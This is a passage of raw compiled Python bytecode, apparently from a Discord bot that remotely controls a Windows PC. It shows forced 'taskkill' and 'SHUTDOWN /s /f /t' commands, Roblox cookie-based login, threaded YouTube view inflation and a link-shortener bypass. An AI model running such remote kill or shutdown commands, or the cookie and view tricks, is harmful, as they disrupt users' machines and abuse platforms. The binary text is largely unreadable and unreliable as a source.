errori,\x01\x00\x00)\tr\x8c\x00\x00\x00r\x8b\x00\x00\x00r\x84\x00\x00\x00Z\x0fmaximize_windowZ\nadd_cookierd\x00\x00\x00r\x1e\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x11robloxlogincookie\xdb\x00\x00\x00s\x16\x00\x00\x00\x06\x02\n\x01\x08\x01\x02\x01\x1e\x01\x06\x01\n\x01\n\x01\x02\x01\n\x01\x02\xffr\x91\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s<\x00\x00\x00\x87\x00f\x01d\x01d\x02\x84\x08}\x02t\x00t\x01|\x00\x83\x01\x83\x01D\x00]\x0f}\x03t\x02j\x03|\x02d\x03\x8d\x01\xa0\x04\xa1\x00\x01\x00t\x05\xa0\x06d\x04\xa1\x01\x01\x00q\x0cd\x00S\x00)\x05Nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x13\x00\x00\x00s0\x00\x00\x00t\x00\x83\x00a\x01t\x01\xa0\x02\x88\x00\xa1\x01\x01\x00t\x03\xa0\x04d\x01\xa1\x01\x01\x00\t\x00t\x01\xa0\x05\xa1\x00\x01\x00t\x03\xa0\x04d\x03\xa1\x01\x01\x00q\x0e)\x04N\xe9\t\x00\x00\x00T\xe9\x08\x00\x00\x00)\x06r\x8c\x00\x00\x00r\x8b\x00\x00\x00r\x84\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00Z\x07refreshr"\x00\x00\x00r\\\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0byoutubeviwe\xe8\x00\x00\x00s\x0e\x00\x00\x00\x06\x02\n\x01\n\x01\x02\x01\x08\x01\n\x01\x02\xfez\x1bgfgggg.<locals>.youtubeviwe\xa9\x01\xda\x06targetrr\x00\x00\x00)\x07r\x1d\x00\x00\x00\xda\x03int\xda\tthreading\xda\x06Thread\xda\x05startrl\x00\x00\x00rm\x00\x00\x00)\x04\xda\x04manyr]\x00\x00\x00r\x94\x00\x00\x00Z\x03iiir"\x00\x00\x00r\\\x00\x00\x00r\x0f\x00\x00\x00\xda\x06gfgggg\xe7\x00\x00\x00s\n\x00\x00\x00\x0c\x01\x10\x08\x10\x01\x0c\x01\x04\xfer\x9c\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00s\x96\x00\x00\x00d\x01\xa0\x00d\x02d\x03d\x04d\x05\xa1\x04d\x06\x17\x00}\x00t\x01j\x02d\x07d\x08\x8d\x01D\x00]8}\x01t\x03j\x04d\tk\x02r"d\n|\x01j\x05v\x00s!|\x01j\x06d\x0bk\x02r"q\x10t\x01\xa0\x07|\x01j\x08\xa1\x01}\x02|\x00d\x01\xa0\x00|\x01j\tt\n|\x02j\x0bd\x0c\x1a\x00\x83\x01d\r\x17\x00t\n|\x02j\x0cd\x0c\x1a\x00\x83\x01d\r\x17\x00t\n|\x02j\r\x83\x01d\x0e\x17\x00\xa1\x04d\x06\x17\x007\x00}\x00q\x10|\x00S\x00)\x0fNz\x18{:<9} {:<9} {:<9} {:<9} Z\x05DriveZ\x04FreeZ\x05Totalz\x04Use%r2\x00\x00\x00F)\x01\xda\x03all\xda\x02ntZ\x05cdromr\x0f\x00\x00\x00i\x00\x00\x00@Z\x02GB\xfa\x01%)\x0erk\x00\x00\x00\xda\x06psutilZ\x0fdisk_partitionsr8\x00\x00\x00r%\x00\x00\x00\xda\x04optsZ\x06fstype\xda\ndisk_usageZ\nmountpointZ\x06devicerB\x00\x00\x00\xda\x04free\xda\x05total\xda\x07percent)\x03Z\x04disk\xda\x04part\xda\x05usager"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\tdisk_data\xf3\x00\x00\x00s\x0e\x00\x00\x00\x14\x01\x10\x01\n\x01\x16\x01\x0c\x01B\x01\x04\x01r\xa8\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sD\x00\x00\x00d\x01}\x00t\x00r t\x01t\x02\x83\x01\x01\x00t\x03d\x02|\x00\x9b\x00\x9d\x02\x83\x01\x01\x00t\x04d\x03\x83\x01\x01\x00t\x05\xa0\x06d\x04\xa1\x01\x01\x00|\x00d\x057\x00}\x00t\x00s\x04d\x00S\x00d\x00S\x00)\x06Nr\x01\x00\x00\x00z\x06login i\xb0\x04\x00\x00\xfa#taskkill/im RobloxPlayerBeta.exe /Fr*\x00\x00\x00)\x07ri\x00\x00\x00re\x00\x00\x00rd\x00\x00\x00r\x1e\x00\x00\x00ro\x00\x00\x00r8\x00\x00\x00\xda\x06system)\x01rH\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x05noone\xfb\x00\x00\x00s\x04\x00\x00\x00\x04\x02@\x01r\xab\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xf3,\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03d\x03e\x04j\x05f\x02d\x04d\x05\x84\x04Z\x06\x87\x00\x04\x00Z\x07S\x00)\x06\xda\x06Bypassc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\xf3.\x00\x00\x00t\x00\x83\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02j\x03j\x04d\x02d\x03d\x04\x8d\x02|\x00_\x05|\x00\xa0\x06|\x00j\x05\xa1\x01\x01\x00d\x00S\x00)\x05Nz\nUrl Bypass\xda\x03UrlT\xa9\x02r\x14\x00\x00\x00\xda\x08required)\x07\xda\x05super\xda\x08__init__r\x1a\x00\x00\x00\xda\x02ui\xda\tTextInputr]\x00\x00\x00\xda\x08add_item\xa9\x01\xda\x04self\xa9\x01\xda\t__class__r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00\x00\x01\x00\x00\xf3\x0c\x00\x00\x00\x0c\x01\x06\x01\x02\x01\x02\x01\x08\xfe\x10\x04z\x0fBypass.__init__\xda\x0binteractionc\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\x80\x00\x00\x00\x81\x01t\x00j\x01d\x01d\x02|\x00j\x02j\x03i\x01d\x03d\x04i\x01d\x05\x8d\x03}\x02d\x06|\x02\xa0\x04\xa1\x00d\x07\x19\x00\x9b\x00d\x08|\x02\xa0\x04\xa1\x00d\t\x19\x00\x9b\x00d\n|\x02\xa0\x04\xa1\x00d\x0b\x19\x00\x9b\x00d\x0c\x9d\x07}\x03t\x05j\x06d\r|\x03d\x0e\x8d\x02}\x04|\x01j\x07|\x04d\x0f\x8d\x01I\x00d\x00H\x00\x01\x00t\x08|\x04\x83\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x10Nz\x17https://api.bypass.vip/r]\x00\x00\x00z\nuser-agentz\x83Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36)\x02rE\x00\x00\x00r7\x00\x00\x00z\x15\n        Old Link  : \xda\x05queryz\x15\n        Medthod   : Z\x07websitez\x15\n        Bypass To : Z\x0bdestinationz\t\n        z\x07By Pass\xa9\x02r\x13\x00\x00\x00r3\x00\x00\x00r\x17\x00\x00\x00)\trC\x00\x00\x00rD\x00\x00\x00r]\x00\x00\x00r\x90\x00\x00\x00rE\x00\x00\x00r\x1a\x00\x00\x00\xda\x05Embedr\x1c\x00\x00\x00r#\x00\x00\x00)\x05r\xb8\x00\x00\x00r\xbc\x00\x00\x00Z\x03asd\xda\x04doneZ\x02wwr"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x08callback\x07\x01\x00\x00s\x18\x00\x00\x00\x02\x80\x1c\x01\x02\x01\n\x01\x04\xff\n\x02\x04\xfe\n\x03\x08\xfd\x0e\x05\x12\x01\x12\x01z\x0fBypass.callback\xa9\x08\xda\x08__name__\xda\n__module__\xda\x0c__qualname__r\xb3\x00\x00\x00r\x1a\x00\x00\x00\xda\x0bInteractionr\xc1\x00\x00\x00\xda\r__classcell__r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r\xad\x00\x00\x00\xff\x00\x00\x00\xf3\x06\x00\x00\x00\x08\x00\x0c\x01\x18\x07r\xad\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00r\xac\x00\x00\x00)\x06\xda\x08youtubevc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00sL\x00\x00\x00t\x00\x83\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02j\x03j\x04d\x02d\x03d\x04\x8d\x02|\x00_\x05t\x02j\x03j\x04d\x05d\x03d\x04\x8d\x02|\x00_\x06|\x00\xa0\x07|\x00j\x05\xa1\x01\x01\x00|\x00\xa0\x07|\x00j\x06\xa1\x01\x01\x00d\x00S\x00)\x06Nz\x0cYoutube Viewz\x11Url Youtube VideoTr\xb0\x00\x00\x00u\x15\x00\x00\x00\xe0\xb8\x88\xe0\xb8\xb3\xe0\xb8\x99\xe0\xb8\xa7\xe0\xb8\x99\xe0\xb8\x88\xe0\xb8\xad)\x08r\xb2\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xb5\x00\x00\x00r]\x00\x00\x00r\x9b\x00\x00\x00r\xb6\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00\x12\x01\x00\x00s\x16\x00\x00\x00\x0c\x01\x06\x01\x02\x01\x02\x01\x08\xfe\x06\x04\x02\x01\x02\x01\x08\xfe\x0c\x04\x10\x01z\x11youtubev.__init__r\xbc\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sT\x00\x00\x00\x81\x01z\x1a|\x01\xa0\x00d\x01\xa1\x01I\x00d\x00H\x00\x01\x00t\x01j\x02t\x03|\x00j\x04j\x05|\x00j\x06j\x05f\x02d\x02\x8d\x02\xa0\x07\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x01\xa0\x00d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04N\xf5\x12\x00\x00\x00\xe0\xb8\xaa\xe0\xb8\xb3\xe0\xb9\x80\xe0\xb8\xa3\xe0\xb9\x87\xe0\xb8\x88)\x02r\x96\x00\x00\x00\xda\x04args\xf5\x1b\x00\x00\x00\xe0\xb9\x84\xe0\xb8\xa1\xe0\xb9\x88\xe0\xb8\xaa\xe0\xb8\xb3\xe0\xb9\x80\xe0\xb8\xa3\xe0\xb9\x87\xe0\xb8\x88)\x08r\x1c\x00\x00\x00r\x98\x00\x00\x00r\x99\x00\x00\x00r\x9c\x00\x00\x00r\x9b\x00\x00\x00r\x90\x00\x00\x00r]\x00\x00\x00r\x9a\x00\x00\x00\xa9\x02r\xb8\x00\x00\x00r\xbc\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xc1\x00\x00\x00\x1e\x01\x00\x00s\n\x00\x00\x00\x02\x80\x02\x01\x10\x01$\x01\x1c\x01z\x11youtubev.callbackr\xc2\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r\xc9\x00\x00\x00\x11\x01\x00\x00s\x06\x00\x00\x00\x08\x00\x0c\x01\x18\x0cr\xc9\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00r\xac\x00\x00\x00)\x06\xda\x05endpgc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00r\xae\x00\x00\x00)\x05Nz\tTask Killz\x19exe name ex[valorant.exe]Tr\xb0\x00\x00\x00)\x07r\xb2\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xb5\x00\x00\x00\xda\x03exer\xb6\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00$\x01\x00\x00r\xbb\x00\x00\x00z\x0eendpg.__init__r\xbc\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sL\x00\x00\x00\x81\x01z\x16t\x00\xa0\x01d\x01|\x00j\x02j\x03\x9b\x00d\x02\x9d\x03\xa1\x01\x01\x00|\x01\xa0\x04d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x01\xa0\x04d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05N\xfa\x0ctaskkill/im \xfa\x03 /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05r8\x00\x00\x00r\xaa\x00\x00\x00r\xcf\x00\x00\x00r\x90\x00\x00\x00r\x1c\x00\x00\x00r\xcd\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xc1\x00\x00\x00+\x01\x00\x00s\n\x00\x00\x00\x02\x80\x02\x01\x16\x01\x16\x01\x1c\x01z\x0eendpg.callbackr\xc2\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r\xce\x00\x00\x00#\x01\x00\x00r\xc8\x00\x00\x00r\xce\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00r\xac\x00\x00\x00)\x06\xda\tShutdown1c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00s.\x00\x00\x00t\x00\x83\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02j\x03j\x04d\x01d\x02d\x03\x8d\x02|\x00_\x05|\x00\xa0\x06|\x00j\x05\xa1\x01\x01\x00d\x00S\x00)\x04Nz\x11Set Shutdown TimeTr\xb0\x00\x00\x00)\x07r\xb2\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xb5\x00\x00\x00\xda\x02ttr\xb6\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x001\x01\x00\x00r\xbb\x00\x00\x00z\x12Shutdown1.__init__r\xbc\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sJ\x00\x00\x00\x81\x01z\x15t\x00\xa0\x01d\x01|\x00j\x02j\x03\x9b\x00\x9d\x02\xa1\x01\x01\x00|\x01\xa0\x04d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x01\xa0\x04d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nz\x12SHUTDOWN /s /f /t r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05r8\x00\x00\x00r\xaa\x00\x00\x00r\xd3\x00\x00\x00r\x90\x00\x00\x00r\x1c\x00\x00\x00r\xcd\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xc1\x00\x00\x008\x01\x00\x00s\x06\x00\x00\x00\x02\x80,\x01\x1c\x01z\x12Shutdown1.callbackr\xc2\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r\xd2\x00\x00\x000\x01\x00\x00r\xc8\x00\x00\x00r\xd2\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s$\x01\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x04d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x08d\t\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\ne\x04j\x07j\x08d\x0bd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x0cd\r\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ee\x04j\x07j\x08d\x0fd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x10d\x11\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x12e\x04j\x07j\x08d\x13d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x14d\x15\x84\x04\x83\x01Z\x0ee\x04j\x05j\x06d\x16e\x04j\x07j\x08d\x17d\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x18d\x19\x84\x04\x83\x01Z\x0fe\x04j\x05j\x06d\x1ae\x04j\x07j\x10d\x1bd\x05\x8d\x03d\x06e\x04j\td\x07e\x04j\nf\x04d\x1cd\x1d\x84\x04\x83\x01Z\x11\x87\x00\x04\x00Z\x12S\x00)\x1e\xda\x04cappc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\xf3\x12\x00\x00\x00t\x00\x83\x00j\x01d\x00d\x01\x8d\x01\x01\x00d\x00S\x00\xa9\x02N)\x01\xda\x07timeout\xa9\x02r\xb2\x00\x00\x00r\xb3\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00<\x01\x00\x00s\x02\x00\x00\x00\x12\x01z\rcapp.__init__\xda\x08Valorant\xda\x02c1\xa9\x03r\x14\x00\x00\x00r\x15\x00\x00\x00Z\tcustom_id\xda\x06buttonr\xbc\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3J\x00\x00\x00\x81\x01z\x15t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x00\xa0\x01d\x02\xa1\x01\x01\x00|\x02\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x02d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nz%taskkill/im RiotClientServices.exe /Fz\x1btaskkill/im VALORANT.exe /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00\xa9\x03r8\x00\x00\x00r\xaa\x00\x00\x00r\x1c\x00\x00\x00\xa9\x03r\xb8\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xda\x00\x00\x00>\x01\x00\x00\xf3\x0e\x00\x00\x00\x02\x80\x02\x02\n\x01\n\x01\x16\x01\x06\x01\x16\x01z\x07capp.c1\xda\x06Roblox\xda\x02c2c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xdd\x00\x00\x00)\x05Nz\'taskkill/im RobloxPlayerLauncher.exe /Fr\xa9\x00\x00\x00r\xca\x00\x00\x00r\xcc\x00\x00\x00r\xde\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xe2\x00\x00\x00F\x01\x00\x00r\xe0\x00\x00\x00z\x07capp.c2\xfa\x10Synapse Launcher\xda\x02c3c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x83\x00\x00\x00s\x92\x00\x00\x00\x81\x01z9t\x00\x9b\x00d\x01\x9d\x02\x89\x00\x87\x00f\x01d\x02d\x03\x84\x08t\x01\x88\x00\x83\x01D\x00\x83\x01}\x03|\x03D\x00]\x1b}\x04d\x04|\x04v\x00s\x1ed\x05|\x04v\x00r"\x01\x00W\x00d\x00S\x00d\x06|\x04v\x00r/t\x02\xa0\x03d\x07|\x04\x9b\x00d\x08\x9d\x03\xa1\x01\x01\x00q\x14|\x02\xa0\x04d\t\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x04d\n\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x0bNrL\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x13\x00\x00\x00s\x1e\x00\x00\x00g\x00|\x00]\x0b}\x01t\x00t\x01\x88\x00|\x01\x83\x02\x83\x01r\x02|\x01\x91\x02q\x02S\x00r"\x00\x00\x00r\x05\x00\x00\x00rM\x00\x00\x00rO\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00rP\x00\x00\x00R\x01\x00\x00s\x02\x00\x00\x00\x1e\x00z\x1bcapp.c3.<locals>.<listcomp>rQ\x00\x00\x00rR\x00\x00\x00r\xcf\x00\x00\x00r\xd0\x00\x00\x00r\xd1\x00\x00\x00r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x05rT\x00\x00\x00r\x04\x00\x00\x00r8\x00\x00\x00r\xaa\x00\x00\x00r\x1c\x00\x00\x00)\x05r\xb8\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00rX\x00\x00\x00rY\x00\x00\x00r"\x00\x00\x00rO\x00\x00\x00r\x0f\x00\x00\x00r\xe4\x00\x00\x00N\x01\x00\x00s\x18\x00\x00\x00\x02\x80\x02\x02\n\x01\x16\x01\x08\x01\x18\x01\x08\x01\x12\x01\x02\x80\x16\x01\x06\x01\x16\x01z\x07capp.c3\xda\x0fMultiple_ROBLOX\xda\x02c4c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3@\x00\x00\x00\x81\x01z\x10t\x00\xa0\x01d\x01\xa1\x01\x01\x00|\x02\xa0\x02d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nz"taskkill/im Multiple_ROBLOX.exe /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xde\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xe6\x00\x00\x00Z\x01\x00\x00s\x0c\x00\x00\x00\x02\x80\x02\x02\n\x01\x16\x01\x06\x01\x16\x01z\x07capp.c4\xda\tTLauncher\xda\x02c5c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00r\xdd\x00\x00\x00)\x05Nz\x18taskkill/im javaw.exe /Fz\x1ctaskkill/im TLauncher.exe /Fr\xca\x00\x00\x00r\xcc\x00\x00\x00r\xde\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xe9\x00\x00\x00a\x01\x00\x00r\xe0\x00\x00\x00z\x07capp.c5z\x07out app\xda\x02c6c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00\xf3:\x00\x00\x00\x81\x01z\r|\x02j\x00\xa0\x01t\x02\x83\x00\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x01\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00\xa9\x02Nr\xcc\x00\x00\x00)\x04rJ\x00\x00\x00\xda\nsend_modalr\xce\x00\x00\x00r\x1c\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xea\x00\x00\x00i\x01\x00\x00\xf3\x06\x00\x00\x00\x02\x80\x1c\x02\x1c\x01z\x07capp.c6)\x13r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xdc\x00\x00\x00r,\x00\x00\x00r.\x00\x00\x00\xda\x06Buttonr\xc6\x00\x00\x00r\xda\x00\x00\x00r\xe2\x00\x00\x00r\xe4\x00\x00\x00r\xe6\x00\x00\x00r\xe9\x00\x00\x00\xda\x04grayr\xea\x00\x00\x00r\xc7\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r\xd4\x00\x00\x00;\x01\x00\x00s\x1c\x00\x00\x00\x08\x00\x0c\x01\x14\x02\x18\x01\x14\x07\x18\x01\x14\x07\x18\x01\x14\x0b\x18\x01\x14\x06\x18\x01\x14\x07 \x01r\xd4\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s$\x01\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ce\x04j\x07j\x08d\x0cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\rd\x0e\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x0fe\x04j\x07j\x08d\x0fd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x10d\x11\x84\x04\x83\x01Z\x0ee\x04j\x05j\x06d\x12e\x04j\x07j\x08d\x12d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x13d\x14\x84\x04\x83\x01Z\x0fe\x04j\x05j\x06d\x15e\x04j\x07j\x08d\x15d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x16d\x17\x84\x04\x83\x01Z\x10\x87\x00\x04\x00Z\x11S\x00)\x18\xda\x08mysystemc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd8\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00n\x01\x00\x00\xf3\x02\x00\x00\x00\x12\x00z\x11mysystem.__init__z\x08check Pcr\xdb\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xd0\x00\x00\x00\x81\x01zXt\x00j\x01d\x01d\x02d\x03\x8d\x02}\x03|\x03j\x02d\x04t\x03t\x04\xa0\x05d\x05\xa1\x01\x83\x01\x9b\x00d\x06\x9d\x02d\x07d\x08\x8d\x03\x01\x00|\x03j\x02d\tt\x03t\x04\xa0\x06\xa1\x00j\x07\x83\x01\x9b\x00d\x06\x9d\x02d\x07d\x08\x8d\x03\x01\x00|\x03j\x02d\nt\x04\xa0\x06\xa1\x00j\x08d\x0b\x14\x00t\x04\xa0\x06\xa1\x00j\t\x1b\x00\x9b\x00d\x06\x9d\x02d\x07d\x08\x8d\x03\x01\x00|\x03j\x02d\x0ct\n\x83\x00d\x07d\x08\x8d\x03\x01\x00|\x02j\x0b|\x03d\r\x8d\x01I\x00d\x00H\x00\x01\x00t\x0c|\x03\x83\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x0bd\x0e\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x0fNz\x15System Resource Usagez\'See CPU and memory usage of the system.r\xbe\x00\x00\x00z\tCPU Usage\xe9\x04\x00\x00\x00r\x9f\x00\x00\x00F)\x03r%\x00\x00\x00r\x90\x00\x00\x00\xda\x06inlinez\x0cMemory 